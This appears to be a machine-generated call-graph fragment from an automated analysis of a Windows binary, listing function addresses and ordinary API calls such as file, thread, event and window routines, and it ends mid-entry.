bd0fd6 GetModuleHandleExW 18167->18174 18169 bd0f86 18169->18152 18175 bd1018 18174->18175 18176 bd0ff5 GetProcAddress 18174->18176 18178 bd101e FreeLibrary 18175->18178 18179 bd0f4c 18175->18179 18177 bd100a 18176->18177 18177->18175 18178->18179 18179->18163 18181 bd0dff CallCatchBlock 18180->18181 18196 bd280c EnterCriticalSection 18181->18196 18183 bd0e09 18197 bd0e40 18183->18197 18185 bd0e16 18201 bd0e34 18185->18201 18188 bd0f91 18225 bd26e3 GetPEB 18188->18225 18191 bd0fc0 18194 bd0fd6 IsInExceptionSpec 3 API calls 18191->18194 18192 bd0fa0 GetPEB 18192->18191 18193 bd0fb0 GetCurrentProcess TerminateProcess 18192->18193 18193->18191 18195 bd0fc8 ExitProcess 18194->18195 18196->18183 18198 bd0e4c CallCatchBlock 18197->18198 18199 bd0ead IsInExceptionSpec 18198->18199 18204 bd1514 18198->18204 18199->18185 18224 bd2854 LeaveCriticalSection 18201->18224 18203 bd0e22 18203->18169 18203->18188 18207 bd1245 18204->18207 18208 bd1251 CallCatchBlock 18207->18208 18215 bd280c EnterCriticalSection 18208->18215 18210 bd125f 18216 bd1424 18210->18216 18215->18210 18217 bd1443 18216->18217 18218 bd126c 18216->18218 18217->18218 18219 bd1bfb _free 14 API calls 18217->18219 18220 bd1294 18218->18220 18219->18218 18223 bd2854 LeaveCriticalSection 18220->18223 18222 bd127d 18222->18199 18223->18222 18224->18203 18226 bd26fd 18225->18226 18227 bd0f9b 18225->18227 18229 bd235e 18226->18229 18227->18191 18227->18192 18230 bd22db __dosmaperr 5 API calls 18229->18230 18231 bd237a 18230->18231 18231->18227 18232 bbbc19 18233 bbbc60 18232->18233 18234 bcc0bb 16 API calls 18233->18234 18241 bbbc89 18233->18241 18235 bbbd85 18234->18235 18236 bcc0bb 16 API calls 18235->18236 18239 bbbe30 18236->18239 18240 bbbbea 71 API calls 18239->18240 18239->18241 18242 bbbaa0 18239->18242 18246 bbcb09 18239->18246 18240->18239 18245 bbbaa5 18242->18245 18243 bbbad7 18243->18239 18244 bbb909 71 API calls 18244->18245 18245->18243 18245->18244 18282 bb93ed 18246->18282 18249 bbd4dd 18250 bceddc CallUnexpected RaiseException 18249->18250 18253 bbd4f2 18250->18253 18251 bbcba7 18254 bbcbd1 18251->18254 18304 bbc743 18251->18304 18253->18239 18254->18239 18257 bbcc0a 18257->18254 18258 bcc0bb 16 API calls 18257->18258 18278 bbcdbb 18257->18278 18270 bbcc99 18258->18270 18259 bbd0e8 18260 bcc0bb 16 API calls 18259->18260 18261 bbd11d 18260->18261 18324 bb461c 18261->18324 18262 bbcda9 18355 bbd554 18262->18355 18267 bbd339 18268 bcc081 16 API calls 18267->18268 18271 bbd35e 18267->18271 18268->18271 18269 bcc0bb 16 API calls 18279 bbd1b1 18269->18279 18270->18254 18270->18262 18351 bbef2c 18270->18351 18271->18254 18276 bbd3b9 18271->18276 18365 bbe1c4 18271->18365 18273 bbd3ae 18275 bcc0bb 16 API calls 18273->18275 18273->18276 18274 bcc081 16 API calls 18274->18278 18275->18276 18334 bbeb3d 18276->18334 18278->18254 18278->18259 18278->18274 18279->18254 18279->18267 18279->18269 18360 bbd6c6 18279->18360 18374 bb911d 18282->18374 18288 bb9594 18290 bcc081 16 API calls 18288->18290 18294 bb95ba 18288->18294 18290->18294 18291 bb911d RaiseException 18291->18294 18292 bb9612 18295 bcc081 16 API calls 18292->18295 18297 bb966b 18292->18297 18298 bb964a 18292->18298 18293 bb969f 18296 bb9692 18293->18296 18299 bb911d RaiseException 18293->18299 18294->18291 18294->18292 18295->18298 18296->18249 18296->18251 18297->18296 18394 bb8ebb 18297->18394 18298->18293 18298->18297 18299->18293 18300 bb911d RaiseException 18301 bb941b 18300->18301 18301->18288 18301->18297 18301->18300 18381 bb8fb3 18301->18381 18385 bb3e6b 18301->18385 18389 bb8fcb 18301->18389 18305 bbc76b 18304->18305 18314 bbc79b 18304->18314 18307 bbc7df 18305->18307 18312 bcc081 16 API calls 18305->18312 18306 bbc817 18407 bbb722 18306->18407 18309 bceddc CallUnexpected RaiseException 18307->18309 18308 bbc7f5 18316 bcc081 16 API calls 18308->18316 18313 bbc89f 18309->18313 18312->18314 18314->18306 18314->18307 18314->18308 18316->18306 18318 bbdfd9 18319 bbdfe5 18318->18319 18320 bbe083 18319->18320 18322 bb66e6 16 API calls 18319->18322 18323 bbe0a8 18319->18323 18320->18323 18423 bbdf87 18320->18423 18322->18319 18323->18257 18434 bcc5f0 18324->18434 18326 bb4628 InitializeCriticalSection 18327 bb464f 18326->18327 18327->18279 18328 bb6f6f 18327->18328 18329 bb6f81 18328->18329 18332 bb6f7a 18328->18332 18435 bb23a3 SetFilePointer 18329->18435 18332->18279 18335 bbeb49 ResetEvent 18334->18335 18336 bbeb5c 18334->18336 18338 bbeb5a 18335->18338 18339 bbeb55 18335->18339 18462 bb45fa CreateEventA 18336->18462 18340 bbeb6d ResetEvent 18338->18340 18341 bbeb80 18338->18341 18350 bbeb94 18338->18350 18461 bb456e GetLastError 18339->18461 18343 bbeb7e 18340->18343 18344 bbeb79 18340->18344 18345 bb45fa 2 API calls 18341->18345 18343->18350 18446 bd04b7 18343->18446 18466 bb456e GetLastError 18344->18466 18345->18343 18348 bbebab 18348->18350 18467 bb456e GetLastError 18348->18467 18350->18254 18352 bbef38 18351->18352 18353 bcc0bb 16 API calls 18352->18353 18354 bbef68 18352->18354 18353->18354 18354->18270 18641 bbc4a4 18355->18641 18357 bbd563 18358 bbd59d __InternalCxxFrameHandler 18357->18358 18359 bcc081 16 API calls 18357->18359 18358->18278 18359->18358 18361 bb1d74 16 API calls 18360->18361 18362 bbd6cf 18361->18362 18363 bcc0bb 16 API calls 18362->18363 18364 bbd6d6 18363->18364 18364->18279 18366 bbe224 18365->18366 18368 bbe1e8 18365->18368 18366->18273 18367 bbe232 18369 bceddc CallUnexpected RaiseException 18367->18369 18368->18366 18368->18367 18370 bbe1c4 17 API calls 18368->18370 18371 bbe249 __EH_prolog3_catch 18369->18371 18370->18368 18657 bbe27f 18371->18657 18373 bbe264 18373->18273 18397 bb90dc 18374->18397 18376 bb9128 18376->18297 18377 bbb653 18376->18377 18378 bbb65f 18377->18378 18379 bbb694 18378->18379 18380 bcc081 16 API calls 18378->18380 18379->18301 18380->18379 18382 bb8fc1 18381->18382 18383 bb8ea5 18381->18383 18382->18301 18383->18301 18384 bceddc CallUnexpected RaiseException 18383->18384 18384->18383 18386 bb3e78 18385->18386 18387 bb3e96 18385->18387 18386->18387 18388 bcc081 16 API calls 18386->18388 18387->18301 18388->18387 18390 bb8fd7 18389->18390 18392 bb8fe1 __InternalCxxFrameHandler 18389->18392 18391 bb8eb6 RaiseException 18390->18391 18390->18392 18393 bb9001 18391->18393 18392->18301 18395 bceddc CallUnexpected RaiseException 18394->18395 18396 bb8ecb 18395->18396 18398 bb90fe 18397->18398 18399 bb9108 18398->18399 18404 bb8eb6 18398->18404 18399->18376 18401 bb911c 18402 bb90dc RaiseException 18401->18402 18403 bb9128 18402->18403 18403->18376 18404->18401 18405 bb8ea5 18404->18405 18405->18404 18406 bceddc CallUnexpected RaiseException 18405->18406 18406->18405 18408 bbb761 18407->18408 18409 bbb735 18407->18409 18415 bbb787 18408->18415 18410 bbb73d 18409->18410 18411 bbb771 18409->18411 18414 bcc081 16 API calls 18410->18414 18412 bceddc CallUnexpected RaiseException 18411->18412 18413 bbb786 18412->18413 18414->18408 18416 bbb79a 18415->18416 18417 bbb7c6 18415->18417 18418 bbb7a2 18416->18418 18419 bbb7d6 18416->18419 18417->18318 18422 bcc081 16 API calls 18418->18422 18420 bceddc CallUnexpected RaiseException 18419->18420 18421 bbb7eb 18420->18421 18422->18417 18426 bbb6cd 18423->18426 18425 bbdf98 IsInExceptionSpec 18425->18323 18427 bbb6fc 18426->18427 18428 bbb6e0 18426->18428 18427->18425 18429 bbb6e8 18428->18429 18430 bbb70c 18428->18430 18433 bcc081 16 API calls 18429->18433 18431 bceddc CallUnexpected RaiseException 18430->18431 18432 bbb721 18431->18432 18433->18427 18434->18326 18436 bb23cb GetLastError 18435->18436 18437 bb23ec 18435->18437 18436->18437 18438 bb23d7 18436->18438 18437->18332 18441 bb225e GetLastError 18437->18441 18443 bb2351 SetFilePointer 18438->18443 18442 bb226a 18441->18442 18442->18332 18444 bb237c SetLastError 18443->18444 18445 bb2372 GetLastError 18443->18445 18444->18437 18445->18444 18447 bd04d8 18446->18447 18448 bd04c4 18446->18448 18468 bd0467 18447->18468 18450 bd1b8b _free 14 API calls 18448->18450 18452 bd04c9 18450->18452 18477 bd1ace 18452->18477 18453 bd04ed CreateThread 18455 bd050c GetLastError 18453->18455 18456 bd0518 18453->18456 18514 bd035b 18453->18514 18480 bd1b55 18455->18480 18485 bd03d9 18456->18485 18461->18338 18463 bb4610 18462->18463 18464 bb4615 18462->18464 18640 bb456e GetLastError 18463->18640 18464->18338 18466->18343 18467->18350 18469 bd1b9e __dosmaperr 14 API calls 18468->18469 18470 bd0478 18469->18470 18471 bd1bfb _free 14 API calls 18470->18471 18472 bd0485 18471->18472 18473 bd048c GetModuleHandleExW 18472->18473 18474 bd04a9 18472->18474 18473->18474 18475 bd03d9 16 API calls 18474->18475 18476 bd04b1 18475->18476 18476->18453 18476->18456 18493 bd1a6a 18477->18493 18479 bd04d4 18479->18348 18511 bd1b78 18480->18511 18486 bd0409 18485->18486 18487 bd03e5 18485->18487 18486->18348 18488 bd03eb CloseHandle 18487->18488 18489 bd03f4 18487->18489 18488->18489 18490 bd03fa FreeLibrary 18489->18490 18491 bd0403 18489->18491 18490->18491 18492 bd1bfb _free 14 API calls 18491->18492 18492->18486 18494 bd20cb __dosmaperr 14 API calls 18493->18494 18495 bd1a75 18494->18495 18496 bd1a83 18495->18496 18501 bd1ade IsProcessorFeaturePresent 18495->18501 18496->18479 18502 bd1aea 18501->18502 18505 bd1922 18502->18505 18506 bd193e IsInExceptionSpec 18505->18506 18507 bd196a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18506->18507 18508 bd1a3b IsInExceptionSpec 18507->18508 18509 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18508->18509 18510 bd1a59 GetCurrentProcess TerminateProcess 18509->18510 18512 bd20cb __dosmaperr 14 API calls 18511->18512 18513 bd1b7d 18512->18513 18515 bd0367 CallCatchBlock 18514->18515 18516 bd036e GetLastError ExitThread 18515->18516 18517 bd037b 18515->18517 18528 bd1f74 GetLastError 18517->18528 18529 bd1f8b 18528->18529 18530 bd1f91 18528->18530 18640->18464 18642 bbc4b4 18641->18642 18649 bbc4e1 __InternalCxxFrameHandler 18641->18649 18646 bcc081 16 API calls 18642->18646 18642->18649 18644 bbc53a __InternalCxxFrameHandler 18653 bbd6ef 18644->18653 18645 bbc569 18647 bbd6ef 16 API calls 18645->18647 18646->18649 18650 bbc57b 18647->18650 18648 bcc081 16 API calls 18648->18644 18649->18644 18649->18648 18651 bbd6ef 16 API calls 18650->18651 18652 bbc587 18651->18652 18652->18357 18654 bbd72b __InternalCxxFrameHandler 18653->18654 18655 bbd6fb 18653->18655 18654->18645 18655->18654 18656 bcc081 16 API calls 18655->18656 18656->18654 18660 bbe28b 18657->18660 18658 bbe2e2 18659 bbe2fb 18658->18659 18661 bbe30f 18658->18661 18665 bbe335 18658->18665 18662 bceddc CallUnexpected RaiseException 18659->18662 18660->18658 18660->18659 18663 bcc081 16 API calls 18660->18663 18667 bcc081 16 API calls 18661->18667 18664 bbe420 18662->18664 18663->18658 18666 bbc4a4 16 API calls 18664->18666 18672 bbe3c9 18665->18672 18676 bc0914 18665->18676 18674 bbe433 18666->18674 18667->18665 18668 bbe4a4 18668->18373 18669 bb457f FindCloseChangeNotification 18669->18674 18670 bb1d74 16 API calls 18671 bbe46c 18670->18671 18671->18668 18671->18670 18673 bcc0bb 16 API calls 18671->18673 18672->18373 18673->18671 18674->18669 18674->18671 18677 bc091f 18676->18677 18679 bc091b 18676->18679 18678 bd0563 ___std_exception_copy 15 API calls 18677->18678 18678->18679 18679->18672 18680 bc6a5f 18681 bc6a6d 18680->18681 18682 bc6aa3 18680->18682 18686 bc6a83 18681->18686 18687 bb190a 16 API calls 18681->18687 18683 bc6aaa SetFileTime 18682->18683 18684 bc6ad0 18682->18684 18685 bb22ef FindCloseChangeNotification 18683->18685 18684->18686 18689 bb2575 22 API calls 18684->18689 18688 bc6ac7 18685->18688 18687->18686 18688->18684 18690 bb225e GetLastError 18688->18690 18689->18686 18690->18684 18691 bbdd18 18694 bbdca4 18691->18694 18693 bbdd20 18699 bbebc2 18694->18699 18696 bbdcd4 18705 bbdb11 18696->18705 18698 bbdcfd 18698->18693 18700 bbebd1 18699->18700 18701 bbebd6 18699->18701 18714 bb45bc SetEvent 18700->18714 18703 bbebe2 18701->18703 18716 bb45a0 WaitForSingleObject 18701->18716 18703->18696 18706 bbebc2 3 API calls 18705->18706 18707 bbdb41 18706->18707 18719 bb457f 18707->18719 18710 bb457f FindCloseChangeNotification 18711 bbdb51 18710->18711 18712 bb457f FindCloseChangeNotification 18711->18712 18713 bbdb59 18712->18713 18713->18698 18715 bb45c8 18714->18715 18715->18701 18715->18715 18717 bb45b8 18716->18717 18718 bb45ae GetLastError 18716->18718 18717->18703 18718->18717 18720 bb4593 18719->18720 18721 bb4587 FindCloseChangeNotification 18719->18721 18720->18710 18721->18720 18722 bb7ebf 18723 bb7ecc 18722->18723 18726 bb7ee7 18722->18726 18724 bb7ed2 KillTimer 18723->18724 18725 bb7ee1 18723->18725 18724->18725 18725->18726 18727 bb7f02 KiUserCallbackDispatcher 18725->18727 18727->18726 18728 bbfd3f 18729 bbfd59 18728->18729 18731 bbfd5e 18729->18731 18732 bbfcf4 18729->18732 18733 bbfcfd 18732->18733 18736 bbfd18 18733->18736 18738 bd0548 18733->18738 18736->18731 18737 bd0563 ___std_exception_copy 15 API calls 18737->18736 18739 bd1bfb _free 14 API calls 18738->18739 18740 bbfd0d 18739->18740 18740->18736 18740->18737 18741 bc0378 18742 bc039a 18741->18742 18745 bc039f __aulldiv 18741->18745 18751 bc0a1d 18742->18751 18746 bc03a8 18745->18746 18747 bc1458 18745->18747 18748 bc1472 18747->18748 18750 bc147a 18747->18750 18748->18746 18750->18748 18754 bc4bfb 18750->18754 18752 bc0914 15 API calls 18751->18752 18753 bc0a2e 18752->18753 18753->18745 18756 bc4c70 18754->18756 18766 bc3cd2 18756->18766 18758 bc4d33 18758->18748 18759 bb45bc SetEvent 18760 bc4cfa 18759->18760 18760->18758 18761 bb45bc SetEvent 18760->18761 18762 bc4d08 18761->18762 18762->18758 18771 bc49b3 18762->18771 18789 bc3cb4 18766->18789 18769 bc3cb4 ResetEvent 18770 bc3ce9 18769->18770 18770->18758 18770->18759 18772 bc49d0 18771->18772 18792 bc4944 18772->18792 18775 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18776 bc49ea 18775->18776 18776->18758 18777 bc3d65 18776->18777 18778 bc3d76 18777->18778 18779 bc3d92 18777->18779 18781 bb45bc SetEvent 18778->18781 18780 bb457f FindCloseChangeNotification 18779->18780 18782 bc3d99 18780->18782 18783 bc3d7d 18781->18783 18784 bb45bc SetEvent 18783->18784 18785 bc3d84 18784->18785 18786 bb45a0 2 API calls 18785->18786 18787 bc3d8b 18786->18787 18788 bb457f FindCloseChangeNotification 18787->18788 18788->18779 18790 bc3cb9 ResetEvent 18789->18790 18791 bc3cc5 18789->18791 18790->18791 18791->18769 18791->18770 18802 bc3ec5 18792->18802 18795 bc49b0 18795->18775 18796 bb45bc SetEvent 18797 bc4972 18796->18797 18798 bb45bc SetEvent 18797->18798 18799 bc497d EnterCriticalSection 18798->18799 18800 bc49a6 LeaveCriticalSection 18799->18800 18801 bc4993 18799->18801 18800->18795 18801->18800 18803 bb45a0 2 API calls 18802->18803 18805 bc3ee5 __InternalCxxFrameHandler 18803->18805 18804 bc493a 18804->18795 18804->18796 18805->18804 18806 bb45bc SetEvent 18805->18806 18808 bc439e EnterCriticalSection 18805->18808 18809 bc43d4 LeaveCriticalSection 18805->18809 18811 bc3da3 EnterCriticalSection LeaveCriticalSection 18805->18811 18812 bc3e6f EnterCriticalSection LeaveCriticalSection 18805->18812 18813 bb45a0 WaitForSingleObject GetLastError 18805->18813 18814 bc3cef 18805->18814 18821 bc3c4b EnterCriticalSection 18805->18821 18806->18805 18808->18805 18809->18805 18811->18805 18812->18805 18813->18805 18815 bc3cd2 ResetEvent 18814->18815 18816 bc3cf8 18815->18816 18817 bd04b7 48 API calls 18816->18817 18820 bc3d27 18816->18820 18818 bc3d18 18817->18818 18818->18820 18824 bb456e GetLastError 18818->18824 18820->18805 18822 bc3c89 18821->18822 18823 bc3ca1 LeaveCriticalSection 18821->18823 18822->18823 18823->18805 18824->18820 18825 bc5ef4 18828 bc5e3b 18825->18828 18827 bc5efc 18829 bc5e80 18828->18829 18830 bc5e73 DestroyWindow 18828->18830 18833 bc5cbd DeleteCriticalSection 18829->18833 18830->18829 18832 bc5e98 18832->18827 18834 bb457f FindCloseChangeNotification 18833->18834 18835 bc5cd2 18834->18835 18835->18832 18836 bc4e95 18837 bc4eac 18836->18837 18838 bc4ea5 18836->18838 18840 bc4ebf 18838->18840 18841 bc4ef9 18840->18841 18844 bc4f14 18841->18844 18845 bc4f3c 18844->18845 18846 bc4f42 VirtualFree 18845->18846 18847 bc4f01 18845->18847 18846->18845 18847->18837 18848 bb7bf0 18849 bb45bc SetEvent 18848->18849 18850 bb7c0c GetDlgItem 18849->18850 18851 bb7c43 SetTimer 18850->18851 18852 bb7c22 LoadIconA SendMessageA 18850->18852 18857 bb7b3e 18851->18857 18852->18851 18854 bb7c5e 18866 bb7fb2 18854->18866 18858 bb7b4a 18857->18858 18859 bb7b58 SetWindowTextW 18858->18859 18860 bb7b63 18858->18860 18862 bb7b8f 18859->18862 18861 bb16dc 16 API calls 18860->18861 18863 bb7b6b 18861->18863 18862->18854 18864 bb2037 19 API calls 18863->18864 18865 bb7b7c SetWindowTextA 18864->18865 18865->18862 18867 bb7fbb PostMessageA 18866->18867 18868 bb7c65 18866->18868 18867->18868 18869 bc6151 18872 bc610b 18869->18872 18871 bc615a 18873 bc6117 __EH_prolog3_catch 18872->18873 18878 bc5f16 18873->18878 18875 bc6130 18913 bc5cf2 18875->18913 18877 bc6138 18877->18871 18879 bc5f25 18878->18879 18880 bb16b8 16 API calls 18879->18880 18881 bc5f37 18880->18881 18882 bb3138 55 API calls 18881->18882 18883 bc5f4a 18882->18883 18884 bc5f6d 18883->18884 18885 bc5f4e 18883->18885 18918 bb4a88 18884->18918 18886 bb190a 16 API calls 18885->18886 18912 bc5f5e 18886->18912 18889 bb17ef 16 API calls 18890 bc5fb8 18889->18890 18922 bb64ab 18890->18922 18892 bc5fd6 18893 bc5ff5 18892->18893 18894 bc5fe0 18892->18894 18896 bb1759 16 API calls 18893->18896 18895 bb190a 16 API calls 18894->18895 18895->18912 18897 bc6001 18896->18897 18942 bb3784 18897->18942 18901 bc6017 18902 bc601b 18901->18902 18903 bc6064 18901->18903 18905 bb16dc 16 API calls 18902->18905 18970 bb1716 18903->18970 18907 bc6028 18905->18907 18962 bb69dc 18907->18962 18910 bc603b 18912->18875 18914 bb45a0 2 API calls 18913->18914 18915 bc5d1f 18914->18915 18916 bc5d39 18915->18916 18917 bc5d25 PostMessageA 18915->18917 18916->18877 18917->18916 18919 bb4a9c 18918->18919 18920 bb16b8 16 API calls 18919->18920 18921 bb4ab9 18920->18921 18921->18889 18923 bb64b7 18922->18923 18924 bcc0bb 16 API calls 18923->18924 18925 bb64cc 18924->18925 18981 bb4864 18925->18981 18927 bb64da 18928 bb16b8 16 API calls 18927->18928 18929 bb6505 18928->18929 18930 bb16b8 16 API calls 18929->18930 18931 bb6511 18930->18931 18932 bb6541 18931->18932 18989 bb2b88 18931->18989 18937 bb6547 18932->18937 19006 bb5e98 18932->19006 18937->18892 18938 bb6569 18938->18937 18939 bb1614 16 API calls 18938->18939 18940 bb1d74 16 API calls 18938->18940 18941 bb1d35 16 API calls 18938->18941 18939->18938 18940->18938 18941->18938 18943 bb378b 18942->18943 18944 bb37a5 18942->18944 18943->18944 18945 bb12c1 16 API calls 18943->18945 18946 bb26ef 18944->18946 18945->18944 18947 bb26fb 18946->18947 18948 bb30f3 22 API calls 18947->18948 18949 bb2702 18948->18949 18950 bb16dc 16 API calls 18949->18950 18954 bb270b 18949->18954 18951 bb274c 18950->18951 18952 bb2779 18951->18952 18951->18954 18953 bb1759 16 API calls 18952->18953 18956 bb2790 18953->18956 18954->18901 18957 bb2798 GetLastError 18956->18957 18958 bb27e9 18956->18958 18959 bb27ee 18956->18959 19381 bb264c 18956->19381 18957->18956 18957->18959 18958->18959 18960 bb184f 16 API calls 18958->18960 18961 bb2603 22 API calls 18958->18961 18959->18954 18960->18958 18961->18958 18963 bb69e8 18962->18963 18964 bb1759 16 API calls 18963->18964 18965 bb69fb 18964->18965 18966 bb16dc 16 API calls 18965->18966 18967 bb6a0f 18966->18967 19394 bb1b03 18967->19394 18969 bb6a20 18969->18910 18971 bb1729 18970->18971 18971->18971 18972 bb1533 16 API calls 18971->18972 18973 bb1736 18972->18973 18974 bc64f1 18973->18974 18975 bb17ef 16 API calls 18974->18975 18976 bc6519 18975->18976 18977 bb17ef 16 API calls 18976->18977 18978 bc6556 18977->18978 18979 bb3784 16 API calls 18978->18979 18980 bc655e 18979->18980 18980->18912 18982 bb4870 18981->18982 18983 bb16b8 16 API calls 18982->18983 18984 bb48a4 18983->18984 18985 bb16b8 16 API calls 18984->18985 18986 bb48ba 18985->18986 18987 bb16b8 16 API calls 18986->18987 18988 bb48c9 18987->18988 18988->18927 19046 bb3bc6 18989->19046 18991 bb2b9a 18992 bb1787 16 API calls 18991->18992 18993 bb2ba8 18991->18993 18992->18993 18994 bb1787 16 API calls 18993->18994 18995 bb2bc3 18994->18995 18996 bb4901 18995->18996 18997 bb490d 18996->18997 18998 bb17ef 16 API calls 18997->18998 18999 bb4936 18998->18999 19000 bb1614 16 API calls 18999->19000 19001 bb494c 19000->19001 19002 bb3138 55 API calls 19001->19002 19003 bb495c 19002->19003 19004 bb225e GetLastError 19003->19004 19005 bb4970 19003->19005 19004->19005 19005->18932 19017 bb5ea7 19006->19017 19008 bb63d5 19012 bb6bb6 VariantClear 19008->19012 19009 bb17ef 16 API calls 19009->19017 19010 bb5fcf 19010->19008 19011 bb63e0 19010->19011 19014 bb6037 19010->19014 19013 bb6bb6 VariantClear 19011->19013 19012->19011 19039 bb5ebd 19013->19039 19014->19011 19016 bb6043 19014->19016 19018 bb6bb6 VariantClear 19016->19018 19017->19009 19017->19010 19017->19039 19045 bb6219 19017->19045 19092 bb4afe 19017->19092 19104 bb5b53 19017->19104 19132 bb6672 19017->19132 19023 bb6048 19018->19023 19022 bb17ef 16 API calls 19022->19039 19024 bb4afe 16 API calls 19023->19024 19023->19039 19025 bb60d3 19024->19025 19140 bb4d79 19025->19140 19027 bb60e7 19027->19039 19154 bb4ba4 19027->19154 19029 bb4a88 16 API calls 19030 bb6170 19029->19030 19032 bb17ef 16 API calls 19030->19032 19033 bb61b1 19032->19033 19158 bb5926 19033->19158 19039->18938 19045->19039 19201 bb58cb 19045->19201 19047 bb3bd2 19046->19047 19048 bb1787 16 API calls 19047->19048 19049 bb3be5 19048->19049 19050 bb3c4a 19049->19050 19055 bb3bf2 19049->19055 19051 bb16b8 16 API calls 19050->19051 19052 bb3c52 19051->19052 19053 bb3c6b 19052->19053 19054 bb3c63 19052->19054 19077 bb2ae0 19053->19077 19056 bb1787 16 API calls 19054->19056 19057 bb16dc 16 API calls 19055->19057 19061 bb3c00 19055->19061 19059 bb3c69 19056->19059 19062 bb3c10 19057->19062 19060 bb3784 16 API calls 19059->19060 19059->19061 19067 bb3c80 19060->19067 19061->18991 19062->19061 19063 bb19c5 16 API calls 19062->19063 19063->19061 19064 bb16b8 16 API calls 19065 bb3cf2 19064->19065 19066 bb3d25 19065->19066 19068 bb3d0c 19065->19068 19069 bb1787 16 API calls 19066->19069 19067->19061 19067->19064 19088 bb1981 19068->19088 19073 bb3d23 19069->19073 19071 bb3d18 19072 bb1981 16 API calls 19071->19072 19072->19073 19073->19061 19074 bb17ef 16 API calls 19073->19074 19075 bb3d5a 19074->19075 19076 bb19c5 16 API calls 19075->19076 19076->19061 19078 bb2aef __EH_prolog3_GS 19077->19078 19079 bb2b49 GetCurrentDirectoryW 19078->19079 19080 bb2b04 GetCurrentDirectoryA 19078->19080 19082 bb1787 16 API calls 19079->19082 19081 bb1bf7 20 API calls 19080->19081 19083 bb2b2f 19081->19083 19086 bb2b3b 19082->19086 19084 bb17ef 16 API calls 19083->19084 19084->19086 19085 bd9167 5 API calls 19087 bb2b87 19085->19087 19086->19085 19087->19059 19089 bb1993 19088->19089 19090 bb15aa 16 API calls 19089->19090 19091 bb19a0 __InternalCxxFrameHandler 19090->19091 19091->19071 19093 bb4b0a 19092->19093 19206 bb4abe 19093->19206 19095 bb4b2b 19096 bb4abe 16 API calls 19095->19096 19097 bb4b37 19096->19097 19098 bb16b8 16 API calls 19097->19098 19099 bb4b43 19098->19099 19100 bb16b8 16 API calls 19099->19100 19101 bb4b4f 19100->19101 19102 bb16b8 16 API calls 19101->19102 19103 bb4b5e 19102->19103 19103->19017 19105 bb5b5f 19104->19105 19106 bb5ba8 19105->19106 19107 bb5b80 19105->19107 19109 bcc0bb 16 API calls 19106->19109 19119 bb5b87 19106->19119 19108 bcc0bb 16 API calls 19107->19108 19108->19119 19111 bb5bb8 19109->19111 19110 bb5926 41 API calls 19113 bb5c45 19110->19113 19112 bb17ef 16 API calls 19111->19112 19114 bb5be6 19112->19114 19115 bb5bf8 19113->19115 19217 bb465f 19113->19217 19212 bb46c1 19114->19212 19115->19017 19118 bb5bf3 19120 bb225e GetLastError 19118->19120 19119->19110 19120->19115 19122 bb1759 16 API calls 19130 bb5cbf 19122->19130 19123 bb12c1 16 API calls 19123->19130 19124 bb16b8 16 API calls 19124->19130 19125 bb19c5 16 API calls 19125->19130 19126 bb17ef 16 API calls 19126->19130 19127 bb1a00 16 API calls 19127->19130 19128 bb46c1 24 API calls 19128->19130 19129 bb3138 55 API calls 19129->19130 19130->19115 19130->19122 19130->19123 19130->19124 19130->19125 19130->19126 19130->19127 19130->19128 19130->19129 19131 bb5926 41 API calls 19130->19131 19131->19130 19133 bb667e 19132->19133 19134 bb1d74 16 API calls 19133->19134 19135 bb6685 19134->19135 19136 bcc0bb 16 API calls 19135->19136 19137 bb668f 19136->19137 19220 bb6766 19137->19220 19139 bb66a1 19139->19017 19145 bb4d85 19140->19145 19141 bb4dd9 19142 bb4e90 19141->19142 19144 bb4e5f 19141->19144 19146 bb4e53 19141->19146 19149 bb4e21 19141->19149 19143 bb6bb6 VariantClear 19142->19143 19143->19149 19144->19142 19148 bb4e5d 19144->19148 19145->19141 19150 bb14d7 16 API calls 19145->19150 19147 bb18ab 17 API calls 19146->19147 19147->19148 19151 bb6bb6 VariantClear 19148->19151 19149->19027 19150->19141 19152 bb4e7d 19151->19152 19152->19149 19238 bb4ea7 19152->19238 19155 bb4bc7 19154->19155 19156 bb6bb6 VariantClear 19155->19156 19157 bb4be7 19156->19157 19157->19029 19157->19039 19159 bb5932 19158->19159 19254 bb52f0 19159->19254 19202 bb17ef 16 API calls 19201->19202 19203 bb5913 19202->19203 19204 bb17ef 16 API calls 19203->19204 19205 bb591f 19204->19205 19205->19022 19207 bb4aca 19206->19207 19208 bb16b8 16 API calls 19207->19208 19209 bb4aeb 19208->19209 19210 bb16b8 16 API calls 19209->19210 19211 bb4af6 19210->19211 19211->19095 19213 bb227e 23 API calls 19212->19213 19214 bb46f4 19213->19214 19215 bb4718 19214->19215 19216 bb4700 SetFileTime 19214->19216 19215->19118 19215->19119 19216->19215 19218 bb1533 16 API calls 19217->19218 19219 bb467b __InternalCxxFrameHandler 19218->19219 19219->19130 19221 bb6772 19220->19221 19232 bb6932 19221->19232 19223 bb67d4 19224 bb6932 16 API calls 19223->19224 19225 bb67e4 19224->19225 19226 bb1759 16 API calls 19225->19226 19227 bb67f4 19226->19227 19228 bb1759 16 API calls 19227->19228 19229 bb6804 19228->19229 19230 bb1759 16 API calls 19229->19230 19231 bb681a 19230->19231 19231->19139 19233 bb693e 19232->19233 19234 bb1759 16 API calls 19233->19234 19235 bb6986 19234->19235 19236 bb1759 16 API calls 19235->19236 19237 bb6996 19236->19237 19237->19223 19239 bb4eb3 19238->19239 19240 bb4ba4 VariantClear 19239->19240 19241 bb4ed3 19240->19241 19242 bb4f2e 19241->19242 19243 bb17ef 16 API calls 19241->19243 19242->19149 19244 bb4eea 19243->19244 19245 bb4f3f 19244->19245 19247 bb4f38 19244->19247 19248 bb4f13 19244->19248 19246 bb6bb6 VariantClear 19245->19246 19246->19242 19247->19245 19249 bb4f26 19247->19249 19250 bb12c1 16 API calls 19248->19250 19252 bb6bb6 VariantClear 19249->19252 19251 bb4f1c 19250->19251 19253 bb1981 16 API calls 19251->19253 19252->19242 19253->19249 19255 bb52fc 19254->19255 19382 bb2658 19381->19382 19383 bb2663 19382->19383 19384 bb2687 CreateDirectoryW 19382->19384 19386 bb1bb2 20 API calls 19383->19386 19385 bb2682 19384->19385 19387 bb2699 GetLastError 19385->19387 19390 bb2695 19385->19390 19388 bb266d CreateDirectoryA 19386->19388 19389 bb26aa 19387->19389 19387->19390 19388->19385 19391 bb16b8 16 API calls 19389->19391 19390->18956 19392 bb26ba 19391->19392 19393 bb3138 55 API calls 19392->19393 19393->19390 19395 bb1b7c 19394->19395 19396 